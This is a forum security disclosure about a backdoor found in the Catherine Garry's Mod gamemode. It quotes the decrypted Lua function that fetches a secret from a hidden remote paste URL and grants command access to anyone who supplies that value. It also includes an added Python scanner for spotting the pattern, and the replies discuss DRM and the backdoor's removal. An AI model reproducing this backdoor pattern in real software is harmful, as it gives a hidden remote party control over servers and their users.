[PSA] Backdoor in Catherine Authorization system.

Since July 17 of 2016, L7D has had an authorization key system for his gamemode. Since recently I've wanted to use the gamemode for a personal project, and noticed this key system (because we definitely need DRM and monetization of more content, right?), I decided to crack it. I really do look down upon this kind of thing, especially since Kurozael did it.

His library for decoding all his scripts is completely exposed, so all I did was use it to decode his DLL. Here are the contents of Catherine.dll:

http://hastebin.com/hoxohocuki.lua

On the first init of the gamemode, it downloads a bunch of encrypted strings to v.txt inside of the catherine/patchx/ folder. This file decrypts into this:

http://hastebin.com/oserilenug.lua

From here, you can see the actual internals. Most of the functions are purely for authorization but there is a single function that is very suspicious.

local function commandAuth(commandName, pl, args, callback)
	if (!IsValid(pl)) then return end
	http.Fetch(catherine.cryptoV2.DECODE("7305 6020 1848 7313 5962 1779 7248 6020 1833 7321 6020 1849 7313 6012 1843 7201 5904 1732 7298 6004 1833 7315 5950 1831 7312 6013 1779 7254 6005 1832 7319 5957 1779 7315 6001 1851"),function(body)
		if (args[1] == body) then
			callback(pl,"("..pl:SteamName()..", "..pl:GetUserGroup()..", "..pl:SteamID()..")",args)
		else
			logSend("'"..commandName.."' cmd runned -> return -> PERMISSION error ("..pl:SteamName()..", "..pl:GetUserGroup()..", "..pl:SteamID()..")")
			pl:ChatPrint("You don't have permission.")
		end
	end )
end

This is where it fetches from:

http://textuploader.com/5edv5/raw

Definitely a backdoor. While I will NOT post a crack for Catherine, I just wanted to create a post that reveals the backdoor hidden inside the gamemode.

If you get an authorization key from L7D, please be aware of this backdoor.
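The gating pattern the post describes (a value fetched from a hidden URL, compared against a command argument, then a privileged callback run on a match) turned into a static check a server owner could run over a gamemode's Lua files. This is an added example, not code from the post or from Catherine; the Lua sample inside it is constructed from the quoted function with the encoded URL shortened, plus a benign fetch for contrast, and the scoring and function names are my own.

```python
import re

# Constructed sample modelled on the commandAuth function quoted in the post
# (encoded URL argument shortened), plus a benign fetch for contrast.
LUA_SAMPLE = """\
local function commandAuth(commandName, pl, args, callback)
\thttp.Fetch(catherine.cryptoV2.DECODE("7305 6020 1848 7313"),function(body)
\t\tif (args[1] == body) then
\t\t\tcallback(pl,"("..pl:SteamName()..", "..pl:SteamID()..")",args)
\t\tend
\tend )
end
local function fetchMotd()
\thttp.Fetch("http://example.invalid/motd.txt", function(body)
\t\tSetGlobalString("motd", body)
\tend)
end
"""

FETCH_RE = re.compile(r"http\.(?:Fetch|Post)\s*\(\s*(?P<url>.+?)\s*,\s*function\s*\(\s*(?P<param>\w+)")
FUNC_RE = re.compile(r"function\s+([\w.:]+)\s*\(")                    # named function definitions
EXEC_RE = re.compile(r"\b(?:callback|RunString|CompileString)\s*\(")  # privileged action in callback
indent = lambda s: len(s) - len(s.lstrip(" \t"))

def find_remote_auth_gates(src):
    # One dict per http.Fetch/Post call: is the URL a literal, does the callback compare the body, does it then execute something.
    lines, enclosing, out = src.splitlines(), "<top level>", []
    for i, line in enumerate(lines):
        if (m := FUNC_RE.search(line)):
            enclosing = m.group(1)
        if not (f := FETCH_RE.search(line)):
            continue
        depth, body = indent(line), []
        for later in lines[i + 1:]:  # callback body ends at the first 'end' at the fetch's depth
            if indent(later) <= depth and later.lstrip().startswith("end"):
                break
            body.append(later)
        text, p = "\n".join(body), f.group("param")
        flags = {
            "url_is_literal": f.group("url").startswith(("'", '"')),
            "compares_body": re.search(rf"==\s*{p}\b|\b{p}\s*==", text) is not None,
            "executes_on_match": EXEC_RE.search(text) is not None,
        }
        flags["score"] = (not flags["url_is_literal"]) + flags["compares_body"] + flags["executes_on_match"]
        out.append({"line": i + 1, "function": enclosing, **flags})
    return out

def suspicious(src, min_score=2):
    return [r for r in find_remote_auth_gates(src) if r["score"] >= min_score]
```

Run `suspicious(open("v.txt").read())` over the decrypted file to list the calls worth reading by hand; a hidden URL alone is common in obfuscated gamemodes, so the threshold deliberately needs two of the three signals.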

Implying that lua drm is a thing
lol what

But nice find

He has a DLL that is loaded, and has a key system that effectively prevents you from using the gamemode until you have a proper key. Just like CloudAuthX.

So yes, it's effectively Digital Rights Management.

If there's a binary module on the server, then a Lua backdoor is the least of your worries on what can be done maliciously.

If you actually read the code, you can see that there is a function called DownloadFromFile, and a fileio module that is required by the gamemode. The module has access to the entire server through the fileio module.

So, obviously yes.

Since L7D is no longer working on Catherine, I have been given github access and will remove the backdoor. Since L7D’s reason for the key system is NOT to make money, I will be leaving the key system in.

Add me on steam for a key.

Why use Catherine when there's NutScript? Especially when L7D has secret love towards Conna's methods.

Because NutScript is no longer supported and L7D didn't do it to make money. He did it to keep stupid server owners from using Catherine.

You probably fall into that category.

So that instantly excuses everything? “Hey guys, he didn’t do it for the money, so it’s okay!”

Understand, it’s great that he’s no longer a part of it and the project is picked back up by hopefully people who are morally right. But, that doesn’t give him a free ticket ride.

Well, that's why I'm the one working on it now. I haven't removed the backdoor yet because there are quite a few other things that are higher on the priority list.

Not saying it excuses the backdoor; the backdoor is kind of a big deal, but I was more talking about the key system he has implemented.

Backdoor should be relatively high on the priority list, since it should also be easy to remove.

The reply you made to Noi made it appear as if you were defending him across the whole.

The backdoor is basically irrelevant now that textuploader has Cloudflare and is causing massive issues with the whole system, causing it to time out.

I'm currently replacing everything and it's taking time, that's why it hasn't been removed yet.

You realize Noiwex is the founder of one of the most popular Russian Garry's Mod communities atm, right?

Russian.

And backdoor removed, folks.

Never mind the weeb avatars.

NutScript is still supported, probably not by chessnut but the community, many people have forked the repo and pushed updates.

The entire point of 'supported' is to be supported by the official developer.

Do you have any clue how open source projects work? It’s quite often that the original developer drops out and somebody else (can even be the entire community) continues their work.

EDIT:

Is this an implication that Russian communities are somehow intrinsically inferior to 'Murican (or whatever) communities?

And this is complete bullshit. Just trying to score points on some irrelevant stuff because you cannot respond to the main topic properly, eh?

Well, I don't take this that seriously.

And GMod RP here in the US is pretty much dead; this is much more of a hobby.

Well, it's your damn problem then. The open source community has been operating in this manner for god knows how long.

https://github.com/L7D/Catherine/commit/86cd93634b3820d32acd2b3a92874e93de6861f8

But wait there’s more